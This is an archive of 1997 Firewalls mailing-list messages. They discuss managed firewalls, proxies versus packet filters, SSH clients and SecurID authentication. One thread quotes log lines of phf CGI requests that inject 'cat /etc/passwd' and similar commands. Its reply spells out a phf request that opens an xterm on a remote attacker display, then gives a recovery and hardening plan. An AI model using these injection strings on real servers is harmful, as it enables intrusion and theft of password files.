From owner-firewalls-outgoing Wed Jun 4 23:00:28 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id WAA13188 for firewalls-outgoing; Wed, 4 Jun 1997 22:58:48 -0700 (PDT) Received: from gate (MNA-cal-mcc-a-pvc253.econnect.net [204.50.214.50]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id WAA13120 for ; Wed, 4 Jun 1997 22:58:28 -0700 (PDT) Received: from a01fs002.nsci.net ([10.1.1.20]) by gate.mcc.net with ESMTP id <324862-14624>; Thu, 5 Jun 1997 00:01:44 -0600 Received: by A01FS002.mcc.net with Internet Mail Service (5.0.1457.3) id ; Thu, 5 Jun 1997 00:01:25 -0600 Message-ID: From: "Paquette, Trevor" To: "'Walczak, Joe'" , "'firewalls@greatcircle.com'" Subject: RE: ISP Connection Date: Thu, 5 Jun 1997 00:01:24 -0600 X-Priority: 3 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.0.1457.3) Content-Type: text/plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Your opinion. And I respect that. The problem here is that you do not TRUST anyone else to manage or operate your firewall. That is the issue. Not if they can do it or not. It is a simple matter of trust. There are companies (mine included) that do manage firewalls for other companies, and we do a pretty damn good job at it. Our clients TRUST us to do it for them. WE are the ones on the hook for any break-ins and possible damage resulting from any outside security incidents. By having others manager their firewall for them, our clients are free from the headaches and hassles of dealing with daily firewall issues. They can concentrate and place their own IT folks in areas that they feel are needed and best used. If that happens to be running a firewall, then great. But if they want the benefit of a secure, reliable and stable Internet connection, but don't have the time, know-how, or need of a firewall administrator, then having someone else run your firewall for you make perfect business sense. 
> -----Original Message----- > From: Walczak, Joe [SMTP:Joe.Walczak@transquest.com] > Sent: Wednesday, June 04, 1997 12:40 PM > To: 'firewalls@greatcircle.com' > Subject: RE: ISP Connection > > > My only comment here is that I would not let ANYONE else > manage/operate > my firewall, ISP or not!!! Secondly, I would not tell anyone which > firewall am I using. The ISP does not need to know that information. > > Joe Walczak > joe.walczak@transquest.com > >---------- > >From: Mariko Yashada[SMTP:mariko@grfn.org] > >Sent: Wednesday, June 04, 1997 3:01 PM > >To: Firewalls Mailing List > >Subject: Re: ISP Connection > > > > > > > >Thank you for all your comments. Last fall our plan was to connect to > the > >Internet through MCI. We security people said fine, but you will need > a > >firewall for any connections between the Internet and the Enterprise > >Network. So we did an evaluation of firewalls and settled on two we > felt > >best suited our needs. The firewall added enough cost to the project > that > >it was postponed. It has now been revived using our ISP for the > connection > >with the hope the ISP can some way offer the security. I see now we > should > >to follow our original plan and put up a firewall at our end. > > > > > >Here is a related question: > > > >There is another local ISP who will connect us at T1 and install a > firewall > >at our location. They will then administer the firewall remotely from > their > >location. They support three different firewalls, Gauntlet, > Firewall-1 and > >Borderware. The advantage is the savings in admin costs. Has anyone > had any > >experience with this type of arrangement? We have also talked to BBN > about > >their Site Patrol product, which is a remotely managed Gauntlet. 
> >
> >Thanks,
> >
> >Mariko

From owner-firewalls-outgoing Wed Jun 4 23:15:50 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id XAA14828 for firewalls-outgoing; Wed, 4 Jun 1997 23:09:48 -0700 (PDT) Received: from ACSacs.Com (sprite.acsacs.com [206.16.240.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id XAA14774 for ; Wed, 4 Jun 1997 23:09:35 -0700 (PDT) Date: Wed, 4 Jun 1997 23:13:47 -0700 From: "Daniel J Blander - Sr. Systems Engineer for ACS" X-Sender: phaedrus@ferrari Reply-To: "Daniel J Blander - Sr. Systems Engineer for ACS" To: Cy Ardoin cc: firewalls@greatcircle.com Subject: RE: PIX and FW-1 (packet filter Question) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

While I don't disagree with what I think was your underlying thought - that packet filters and stateful-inspection firewalls are good, I think this statement is dangerously incorrect:

On Wed, 4 Jun 1997, Cy Ardoin wrote:
> I don't think there is anything an application firewall can
> do that can't also be done by a "packet filter" firewall.

An application firewall specifically controls the content - i.e. the commands, functions, etcetera, that can be passed through a given communications session. An application firewall (proxy) can help me to block Pointcast through port 80 by saying that I won't let certain application layer calls occur through port 80. An application firewall can help me to control things that can occur via SMTP (VRFY, EXPN, DEBUG, et al.)

Be careful. Stateful inspection and packet filters are good at controlling the IPs that get access, controlling the direction of the session, preventing against spoofing, doing basic service blocking, and making certain that the session is absolutely in sync (SYNs, ACKs, FINs and RSTs) but they do not handle content at the application level.
Packet filters work (in general terms) at the Network Layer
Stateful-inspection firewalls work at the Network and Transport Layer
Application firewalls work at the Application Layer

The three should not be considered enemies. They are all important - and the best firewalls have all three on their side.....

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Daniel Blander =8^) Sr. Systems Engineer Applied Computer Solutions
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Phone: (714) 842.7800 Fax: (714) 842.8299 Email: Daniel.Blander@acsacs.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.acsacs.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From owner-firewalls-outgoing Wed Jun 4 23:39:39 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA29552 for firewalls-outgoing; Wed, 4 Jun 1997 14:05:57 -0700 (PDT) Received: from pse01.pios.com (PSE01.PIOS.COM [199.33.129.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id OAA29462 for ; Wed, 4 Jun 1997 14:05:35 -0700 (PDT) Received: by pse01.pios.com; (5.65v3.2/1.3/10May95) id AA17632; Wed, 4 Jun 1997 17:09:14 -0400 Received: from vaxd.PIOS.COM (vaxd.PIOS.COM) by gemini.pios.com (PMDF V5.0-6 #18985) id <01IJOKOK878G8WY05K@gemini.pios.com> for firewalls@greatcircle.com; Wed, 04 Jun 1997 17:11:12 -0400 (EDT) Received: from cal_177.sanjose (192.168.14.7) by PIOS.PIOS.COM (PMDF V5.0-6 #18984) id <01IJOKLDQV3K8Y5E4U@PIOS.PIOS.COM> for firewalls@greatcircle.com; Wed, 04 Jun 1997 17:08:40 -0400 (EDT) Date: Wed, 04 Jun 1997 14:12:31 -0700 From: Bill Stout Subject: RE: PIX and Firewall-1 X-Sender: stoutb@vaxf.pios.com To: firewalls@greatcircle.com Message-Id: <2.2.32.19970604211231.00a0f4dc@vaxf.pios.com> Mime-Version: 1.0 X-Mailer: Windows Eudora Pro Version 2.2 (32) Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7BIT Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Peter Carlson writes....
>in what way are application level gateways more secure than, say, FW-1 or PIX?
>There are certainly capabilities that can be provided via application
>proxies that can't be provided by any filter-based technologies, but what
>types of attacks are a FW-1 or a PIX vulnerable to that application
>proxies aren't?

Do not replace a proxy server with a 'State-based Firewall'. State-based or packet filter firewalls are being marketed well. Engineers who work for these companies know better than to replace proxies with filters, but they're not stupid enough to kill potential sales. ;)

Application proxies monitor commands sent at the application layer, and reconstruct packets so that IP attacks can't be sent beyond the firewall. (From what I understand), State-based (a.k.a. enhanced extended packet filter) security devices inspect the first packet that comes across with enhanced extended filtering rules and can include additional authentication. If that packet passes all filtering rules, remaining packets of that session are passed through without inspection.

A properly configured (Internet) firewall comprises a proxy server protected from the Internet by a packet filter. The better the packet filter (state-based or extended filter), the less work the proxy server has to do as far as inspecting/denying traffic. The packet filter can also protect the proxy server from misc. IP-based attacks.

Good applications for packet filter/State-based firewalls are low-security internet feeds and fast low-latency intranet (10/100/155MB/...) security filtering. Not everyone needs a full application proxy firewall, a subject that comes up when I visit Mom-and-Pop small businesses that want a single feed for their 10 PCs.

IMHO - State-based firewalls are 'only' packet filters, and for the corporate environment should not replace the traditional proxy server, but work in conjunction with one.
_____________________________________________________________________________
Bill Stout (Systems Engineer/Consultant) stoutb@pios.com
Pioneer Standard (Computer Systems & Components) http://www.pios.com/
San Jose, CA (Location of 1 of 52 U.S. offices) (408) 954-9100
*My opinions do not reflect that of the company, and vice versa, thankfully.*

From owner-firewalls-outgoing Wed Jun 4 23:49:13 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA29553 for firewalls-outgoing; Wed, 4 Jun 1997 11:29:27 -0700 (PDT) Received: from newman (newman.unifiedtech.com [38.251.136.48]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id LAA29466 for ; Wed, 4 Jun 1997 11:29:09 -0700 (PDT) Received: from bass by newman (SMI-8.6/SMI-SVR4) id OAA11400; Wed, 4 Jun 1997 14:30:46 -0400 Message-ID: <3395B45F.7853A99F@unifiedtech.com> Date: Wed, 04 Jun 1997 14:30:55 -0400 From: Mike Jones Organization: Unified Technologies, Inc. X-Mailer: Mozilla 4.0b5C (X11; I; SunOS 5.5.1 sun4m) MIME-Version: 1.0 To: Pedro Salgueiro CC: "'Mike Jones'" , "'firewalls'" Subject: Re: PIX and Firewall-1 X-Priority: 3 (Normal) References: <01BC70CA.41A88880@pcpedro> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Pedro Salgueiro wrote:
> I've been "watching" the discussion regarding the differences between packet-filtering and application level firewalls. I believe that there are some:
> 1 - Packet filtering firewalls are more difficult to manage (It is very simple to mis-configure => less secure).
> It may be very complicated establishing rules.

I would dispute this, at least as regards FireWall-1. My experience and all the reviews I've seen agree that it's very easy to manage.
Now it's certainly the case that something that's easy to configure is easy to MISconfigure, but I don't think there's a firewall in the world that can make up for an admin who doesn't know what he's doing.

> 2 - Packet filter systems are always routing packets (so "fail-open" may occur). A well known constructor firewall crashed with a ping attack and routed all the packets from the insecure network to the secure one.

I'd be *very* interested in knowing whose firewall that was. I also don't think this is necessarily the case. For example, FireWall-1 (which is the firewall I'm most familiar with) works on Solaris by installing a kernel module which is in the path that IP packets go through. I have a hard time seeing how it could "fail open" in that configuration, though I'd admit that it's theoretically possible.

> 3 - If you are using a packet filter system and you provide SMTP, HTTP, etc. you cannot control what the users do with those protocols, i.e., you open or close a port. Application level firewalls provide secure daemons of those protocols.

This is an advantage of application level firewalls. However, there are reasons other than security (caching and spam filtering, for example) to have proxies in place, and I actually prefer an architecture where the security functions, whether proxy or filter based, are separated from the non-security functions.

> Regards,
> ----------
> From: Mike Jones
> Peter Carlson writes....
> > There are many comparisons made by datacomm, lan times, ziff-davis and
> > others. Keep in mind that both pix and fw-1 are glorified packet filters,
> > even though they have a fancy name for it. I would stick with an
> > application level gateway. They are well accepted and known for being more
> > secure.
>
> Many things are known that aren't so. This claim comes by periodically
> in this forum, and I have yet to get an answer to this question: in
> what way are application level gateways more secure than, say, FW-1 or PIX?
> There are certainly capabilities that can be provided via application
> proxies that can't be provided by any filter-based technologies, but what
> types of attacks are a FW-1 or a PIX vulnerable to that application
> proxies aren't?

-- 
Mike Jones
Sr. Technology Advisor
UNIFIED Technologies

From owner-firewalls-outgoing Thu Jun 5 00:02:19 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA13664 for firewalls-outgoing; Wed, 4 Jun 1997 12:49:25 -0700 (PDT) Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id MAA13419 for ; Wed, 4 Jun 1997 12:48:25 -0700 (PDT) Received: from gatekeeper.Bridge.COM (gatekeeper.bridge.com [167.76.159.11]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with SMTP id MAA24034 for ; Wed, 4 Jun 1997 12:25:22 -0700 (PDT) Received: (from mailproxy@localhost) by gatekeeper.Bridge.COM (8.6.12/8.6.9) id OAA20829; Wed, 4 Jun 1997 14:16:46 -0500 Received: from dns1srv.bridge.com(167.76.36.6) by gatekeeper.Bridge.COM via smap (V1.3) id sma020824; Wed Jun 4 14:16:45 1997 Received: from binki.bridge.com (binki.bridge.com [167.76.24.243]) by dns1srv.bridge.com (8.7.6/8.7.3) with ESMTP id OAA17893; Wed, 4 Jun 1997 14:20:48 -0500 (CDT) Received: (from ken@localhost) by binki.bridge.com (8.7/8.7) id OAA09104; Wed, 4 Jun 1997 14:21:18 -0500 (CDT) Date: Wed, 4 Jun 1997 14:21:18 -0500 (CDT) From: Ken Hardy Message-Id: <199706041921.OAA09104@binki.bridge.com> To: jdelgado@nexus.net.mx Subject: Re: Secure Telnet! Cc: firewalls@greatcircle.com X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

There used to be an alpha-level 16-bit encrypting telnet in the SSLeay archives. I don't know if it's still there or if it's been worked on at all. It's compatible with SSL, not SSH, of course.
http://www.psy.uq.oz.au/~ftp/Crypto

-- KH

From owner-firewalls-outgoing Thu Jun 5 00:09:20 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA06341 for firewalls-outgoing; Wed, 4 Jun 1997 12:06:32 -0700 (PDT) Received: from mail.pfsfhq.com ([199.250.186.134]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id MAA06260 for ; Wed, 4 Jun 1997 12:06:10 -0700 (PDT) Received: from neteng02 ([199.250.186.189]) by mail.pfsfhq.com (8.6.12/8.6.9) with SMTP id TAA25098 for ; Wed, 4 Jun 1997 19:15:17 -0400 Message-Id: <199706042315.TAA25098@mail.pfsfhq.com> X-Mailer: Calypso Version 2.10.18 Date: Wed, 04 Jun 1997 15:09:19 -0400 From: "John Kemker" To: firewalls@greatcircle.com Subject: Re: ISP Connection Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Handing over your firewall administration to another organization is not, in my personal opinion, a wise move. You are saying, in effect, that you implicitly trust that organization to always think and act in your organization's best interest. This is not realistic.

"Only those defenses are good, certain and durable, which depend on yourself alone and your own ability." _The_Prince_ --N. Machiavelli

Administer your firewall yourself. Put it up yourself, define the policies yourself and maintain it yourself.

=========== REPLY PARTITION ===========
On 06/04/97, at 12:01 PM, Mariko Yashada wrote:
>
>Here is a related question:
>
>There is another local ISP who will connect us at T1 and install a firewall
>at our location. They will then administer the firewall remotely from their
>location. They support three different firewalls, Gauntlet, Firewall-1 and
>Borderware. The advantage is the savings in admin costs. Has anyone had any
>experience with this type of arrangement? We have also talked to BBN about
>their Site Patrol product, which is a remotely managed Gauntlet.
>
>Thanks,
>
>Mariko

John E. Kemker III
Systems Engineer, Primerica Financial Services
3120 Breckinridge Blvd., Duluth, GA 30199

From owner-firewalls-outgoing Thu Jun 5 00:19:10 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA06941 for firewalls-outgoing; Wed, 4 Jun 1997 12:10:27 -0700 (PDT) Received: from ALABAMA.CF.CS.YALE.EDU (RT-GW.CS.YALE.EDU [128.36.0.13]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id MAA06852 for ; Wed, 4 Jun 1997 12:09:56 -0700 (PDT) From: long-morrow@CS.YALE.EDU Received: from SPARKY.CF.CS.YALE.EDU by ALABAMA.CF.CS.YALE.EDU (8.7.1/res.host.cf-4.0) with ESMTP id PAA17338; Wed, 4 Jun 1997 15:13:21 -0400 (EDT) sender long-morrow@CS.YALE.EDU for Received: by SPARKY.CF.CS.YALE.EDU (Sendmail-8.7.1/res.client.cf-4.0) id PAA02113; Wed, 4 Jun 1997 15:13:18 -0400 (EDT) Date: Wed, 4 Jun 1997 15:13:18 -0400 (EDT) Message-Id: <199706041913.PAA02113@SPARKY.CF.CS.YALE.EDU> To: Firewalls@GreatCircle.COM, swnuck@unixpros.com Subject: Re: getting passwd file via WWW Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

From: Stan Wnuck
>I have noticed on my WWW log files the following 2 entries.
>
>some.remote.location.edu - - [28/Apr/1997:01:33:21 +0015] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0Aypcat%20passwd%0Apwd%0Aid%0Auname%20-a%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 140
>some.remote.location.edu - - [28/Apr/1997:01:33:23 -74587788] "GET /cgi-bin/php.cgi?/etc/passwd" 404 143

Bad news. You've had your /etc/passwd file grabbed on Apr 28th. Someone has most assuredly tried running Crack on it by now and they are not restricted from just running 'cat' or 'ypcat'. The second attempt was not successful as you didn't have a CGI program called php.cgi in your Web server's cgi-bin directory. But the first was. The fact that both requests came in so quickly (back to back within two seconds!)
suggests that someone was running an automated tool which was scanning Web servers for vulnerabilities and logging successes (and probably squirrelling the ill-gotten passwd files away somewhere). Someone was almost certainly not typing in manually the URL to exploit your server via phf & php.

>Does anyone know anything about these cgi scripts or programs?

Yes. Everyone has known about the phf bug for over a year now (check out the CIAC and CERT announcements on it). The php.cgi program (which is not as widely distributed) is also a well-known vulnerability.

>Or how dangerous this is?

Very. If you have a standard Unix /etc/passwd file with readable password hashes (i.e. you don't have a 'shadow' password file) then Crack can be run on the text of the password file. If any of your users had a weak password (the same as their username, a proper name, something easily guessed from their GECOS field, a dictionary word or a common alphabetic or numeric sequence, etc.) then the remote cracker can likely telnet or ftp into your Web server as the user with their password.

In fact, once they have determined that they can get phf to execute a command on your Web server they are not restricted to just 'cat'ting files readable by the userid the Web server is running as. They can also run any remote commands available to users on your machine (presuming you are not running your httpd chroot()d and it sounds like you are not). I.e. some.remote.location.edu could have run (if you have X installed):

"GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0A/usr/bin/X11/xterm%20-display%20some.remote.location.edu:0 HTTP/1.0"

This will often pop up an X Windows xterm terminal window on the intruder's display running as the userid the Web server (httpd) is running as. In some cases you will find that you need to change /usr/bin/X11 to /usr/openwin/bin or wherever the vendor has placed the xterm program.
Then the system cracker is running an interactive session on your machine without having to even crack any user passwords.

In any case, once a system cracker has a foothold (a regular user account on your system) they can then consult the BugTraq archive web site (www.geek-girl.com/bugtraq) and pick one of several root exploit scripts to use to obtain maximum privilege (my faves currently are the fdformat, Sony monitor calibration setuid utilities and ps commands for Solaris 2.5.1). Usually a cracker can have 'root' access on a vanilla Unix OS Web server within an hour using a regular user account with no privileges.

>.............................................., since I am not sure what
>my next move would be.

1. 'rm cgi-bin/phf' (wherever your web server is).
2. Take the machine off the network.
3. Copy the /etc/passwd file to a tape or floppy disk.
4. Disable all user accounts (my preference). Change the root password.
5. Back up the entire system to tape.
6. While the backup is running, run Crack (v5) on the old password file.
7. Check out all of the home directories belonging to users whose passwords you are able to crack.
8. Run COPS (an internal Unix audit tool) on the server machine.
9. Connect the machine to a standalone test LAN.
10. From a separate test machine run Satan and/or ISS (external TCP/IP network security audit tools which are aware of common Unix server vulnerabilities) against the machine.
11. Check the machine against the latest CERT (www.cert.org), CIAC (ciac.llnl.gov), BugTraq (www.geek-girl.com/bugtraq/) security vulnerability advisories to see which patches you haven't installed.
12. Bring down the machine.
13. Write up a report including the web server log, any logs from 'last', IP accounting from your router if it is turned on, etc. Summarize the results of your auditing with the Crack, COPS and Satan or ISS tools. Write up recommendations for securing the vulnerabilities found. Send a copy of your security incident report to CERT, Postmaster@some.remote.location.edu, and any other relevant body (i.e. if your site is military-related there will be a different agency than CERT to which you should report incidents).
14. FORMAT the machine, make NEW filesystem partitions, RE-INSTALL the OS using the latest vendor distribution CDROM.
15. Make sure that you install all of the latest vendor security patches, that you implement all of the suggestions and fix all of the holes that you found were in your configuration by running COPS and Satan/ISS. Apply any fixes recommended in CIAC, CERT, BugTraq and vendor alerts.
16. Audit your new system by retesting using COPS and Satan/ISS.
17. Carefully restore any critical software or user files/directories (only after first inspecting them for setuid/setgid, world-writable and .rhosts/.shosts files). For example you'll want to restore your Web server files, but carefully inspect any CGI programs for Trojans.
18. Remove any CGI programs which came with your Web server but you do not use (which would be most of them -- i.e. phf, test-cgi, nph-test-cgi, etc.). Remove any CGI programs which you have written in a command language or 'shell'.
19. Make users pick a new 'strong' password and re-authenticate themselves to get their account re-enabled. Install a /bin/passwd replacement which screens out obvious and weak passwords.
20. Install Tripwire on the web server machine, checksum the system and other relevant files and periodically re-scan with Tripwire, COPS, Crack and Satan/ISS. Look at WebStalker and other programs which can analyze your Web server log files. Consider installing a firewall or at least a screening router in between your Web server and the Internet.

- H.
Morrow Long

From owner-firewalls-outgoing Thu Jun 5 00:24:46 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id MAA06614 for firewalls-outgoing; Wed, 4 Jun 1997 12:08:04 -0700 (PDT) Received: from relay1.shore.net (relay1.shore.net [192.233.85.129]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id MAA06538 for ; Wed, 4 Jun 1997 12:07:35 -0700 (PDT) Received: from [198.115.179.81] (vin.shore.net [198.115.179.81]) by relay1.shore.net (8.8.3/8.8.3) with ESMTP id PAA05666; Wed, 4 Jun 1997 15:11:07 -0400 (EDT) Message-Id: In-Reply-To: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Wed, 4 Jun 1997 15:13:26 -0500 To: firewalls@greatcircle.com From: Vin McLellan Subject: RE: SecureID, CryptoCard, etc... Cc: joav.kohn@us.landisstaefa.com, Richard.Forno@mail.house.gov, ddrumm@rush.edu Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

With the CEO at Landis & Staefa "gone security crazy" and demanding two-factor authentication (presumably to maintain accountability & audit trails) for employees online, Joav Kohn applied to the List seeking advice and counsel.

>>> anybody using keycard authentication to authenticate users in a
>>> winNT/win95 environment?
>>> my CEO has gone security crazy and would like to implement keycard
>>> authentication across the entire organization. so far, the vendors
>>> haven't been much help with advice on how to get win95 to authenticate
>>> with the cards. any information would be greatly appreciated.
>>> (p.s.. this is for LAN/WAN access, not dial-in)

(There was, I'm sad to note, a distinct lack of sympathy for Mr. Kohn's quandary among the List cognoscenti. That rascal Ranum, among others, razzed him for his boss' naivete in seeking security for Win95 systems, and our veteran network managers online were uncharacteristically silent. Probably green with jealousy that Mr.
Kohn has a CEO with _both_ interest and budget for network security -- the winning combo, but reportedly rare.)

Richard Forno helpfully reported:

>SecurID has an NT/95 workstation client for one-pass authentication.

Not quite. WinNT, yes. Win95, no.

Two-factor authentication -- ACE/SecurID, for example -- typically secures local protected memory, the local network connection, and remote network-based resources. In the NT LAN/WAN universe, this typically requires an ID authentication before a user is allowed direct-logon at his local NT workstation or server; and/or access to selected and protected intranet-based resources (including restricted portions of a public website); and/or connection to the NT Remote Access Service (RAS) or the Internet.

On a Win95 machine, ACE/SecurID authentication validates a user's identity before allowing him or her access to the LAN or WAN -- but offers no protection for local information resources on the PC. (If you need local file protection, consider a robust file or disk encryptor. SDTI has one in RSA SecurPC, but there are plenty of others, YEO and the like.)

Typically, the authentication server sits on its own Unix or NT machine, and each protected resource -- workstation, server, firewall, RDBS or other network resource -- has its own ACE/Agent (what SDTI used to call an ACE/Client.)

Daniel G. Drumm asked why Mr. Kohn specified the LAN/WAN environment in his query:

>>Why would the environment have much to do with it? FW1 or TIS Gauntlet
>>come with support for Secure/ID, you can have your employees get these
>>cards, and authenticate against the Firewall. You can then set a
>>user-by-user policy as to what they are allowed access to, and how long
>>they can access it for.

(Most of the leading firewalls do have ACE/Agent code integrated into them, but the user -- coming into the net at the firewall or elsewhere -- is really authenticating against an ACE/Server, typically on its own host.)
ACE/SecurID access can be restricted for groups of users -- as well as individuals -- and those individuals or groups can be limited to specific access paths into a network (i.e., by ACE/Agents, which can be located in a dial-in comm server, the firewall, etc.), as well as by day and hour-of-day. (All SecurIDs -- and, of course, any static passwords issued for temporary emergency access -- also always have a lifespan determined and specified by the local ACE Administrator.)

One reason the dial-in/WAN distinction might be important is that different environments have different risks associated with them. There is not enough info here to discuss options for L&S, but Mr. Kohn will have to consider the value of the information being handled online and his LAN and WAN threat environments, in order to make a meaningful decision about whether he needs to supplement authentication with full or session encryption. Strong authentication (without network or app-based encryption) potentially leaves a user's session open to session hijacking -- where an active sniffer is used to splice into a user's then-current TCP session (after the user has been authenticated) to physically take over a user's session, with all that user's privileges on the Net.

Different threat environments can also make a difference in the choice of token model, at least with SecurID. The classic SecurID is popular with users for its ease of use; the user simply prepends a PIN to the 30/60 second "tokencode" from his SecurID (great with encryption; sufficient in most other environments.) PinPad SecurID wraps the PIN in the pseudo-random token-code, protecting it more in high-threat environments. A SoftID program secures the PIN like a PINpad card, but since it is PC-resident software, it's open to different threats, despite encrypted storage and the standard protection mechanisms.
Actually, many security pros seem to feel that the token, per se, has become less important as IS organizations look ahead to the emerging need for encryption key-management and all that public-key crypto offers: digital signatures, message and software integrity checks -- as well as message confidentiality and potentially-strong user authentication. I've been preaching this myself for a few years.

We are all, today, about to get a good measure of the demand for these enhanced security functions as our users react to the s/mime-enabled web browsers from Netscape and Microsoft. If, as many expect, that demand is explosive -- maybe now is the time to look ahead to a corporate public-key infrastructure (PKI). Authentication -- even strong token-based user authentication -- may not be enough. Public-key crypto without a token to off-load the key will excite many, but it's a half-way measure and inevitably vulnerable without a two-factor hand-held base.

In short, many more network administrators may find their CEOs "gone security crazy"... and woe be unto him who buys now without looking ahead;-) Authentication is a hassle for users, however vital for auditors, but trinkets like digital sigs intrigue users. Demand is very different when it comes from the bottom up, as well as from the top down. (And PC-resident "private keys" used for digital signatures would be a _painful_ and corrupt compromise.)

SDTI (for which I have done consulting for many years) last year bought RSA Data Security and now offers a coherent strategic vision for how their ACE/SecurID customers can -- in the immediate future -- migrate from strong two-factor authentication to a full public-key crypto environment. SDTI sees their ACE/Server evolving from today's authentication server into a PKI-crypto key and certificate manager. Each user's PKC "private keys" will be stored in hand-held smartcards, or -- for a transition -- maybe in "soft smartcards," activated by a token-code & PIN.
Other vendors will be offering different strategic visions. Investigating those options ought to be on the agenda, at L&S as elsewhere. PKI is coming -- ready or not!

Suerte,
_Vin

Vin McLellan + The Privacy Guild + 53 Nichols St., Chelsea, MA 02150 USA <617> 884-5548 -- <@><@> --

From owner-firewalls-outgoing Thu Jun 5 02:00:39 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id BAA11893 for firewalls-outgoing; Thu, 5 Jun 1997 01:12:36 -0700 (PDT) Received: from cbu.pvtnet.cz (cbu.pvtnet.cz [194.149.105.18]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id BAA11858 for ; Thu, 5 Jun 1997 01:12:24 -0700 (PDT) Received: from snajdr.pvt.net (snajdr.pvt.net [194.149.103.204]) by cbu.pvtnet.cz (8.8.5/8.7.3) with SMTP id KAA27365; Thu, 5 Jun 1997 10:21:20 +0200 (MET DST) Message-ID: <33967557.62C80DFD@pvt.net> Date: Thu, 05 Jun 1997 10:14:15 +0200 From: Petr Snajdr X-Mailer: Mozilla 3.01 (X11; I; Linux 2.0.30 i586) MIME-Version: 1.0 To: Vin McLellan , firewalls@GreatCircle.COM Subject: Re: Secure Telnet!
References: <33956E4A.6590018C@pvt.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

Free ssh client for M$ Windoze from Cedomir Igaly

See: ftp://hotline.pvt.net/pub/win_utils/winsock/ssh/

16-bit version : ssh97126.zip
32-bit version : ssh32.zip
crypto library for 16-bit version : crypl200.zip
crypto library for 32-bit version : crypl110.zip
patch for 32 bit crypto library (DES problem) : patch01.zip

There are 2 snapshots:
ftp://hotline.pvt.net/pub/win_utils/winsock/ssh/ssh.gif
ftp://hotline.pvt.net/pub/win_utils/winsock/ssh/ssh2.gif

-- 
Regards
Petr Snajdr

From owner-firewalls-outgoing Thu Jun 5 02:46:03 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id QAA25602 for firewalls-outgoing; Wed, 4 Jun 1997 16:49:24 -0700 (PDT) Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id QAA25342 for ; Wed, 4 Jun 1997 16:48:25 -0700 (PDT) Received: from mail.ka.inka.de (quechua.inka.de [193.197.84.5]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with ESMTP id QAA27280 for ; Wed, 4 Jun 1997 16:25:05 -0700 (PDT) Received: from uu.inka.de ([193.197.84.8]) by mail.ka.inka.de with smtp (ident root using rfc1413) id m0wZPO5-0004FdC (Debian Smail-3.2 1996-Jul-4 #2); Thu, 5 Jun 1997 01:22:41 +0200 (MET DST) Received: from lina.inka.de (lists@lina.inka.de) by uu.inka.de with bsmtp (S3.1.29.1) id ; Thu, 5 Jun 97 01:22 MET DST Received: by lina.inka.de id m0wZP9A-00014MC (Debian Smail-3.2 1996-Jul-4 #2); Thu, 5 Jun 1997 01:07:16 +0200 (CEST) Message-Id: Date: Thu, 5 Jun 1997 01:07:14 +0200 From: Bernd Eckenfels To: Anton J Aylward Cc: "Mark Horn [ Net Ops ]" , Firewalls@GreatCircle.COM Subject: Re: Plug-gw- One to many relationship References: <3.0.32.19970604114909.00952700@the-wire.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.67
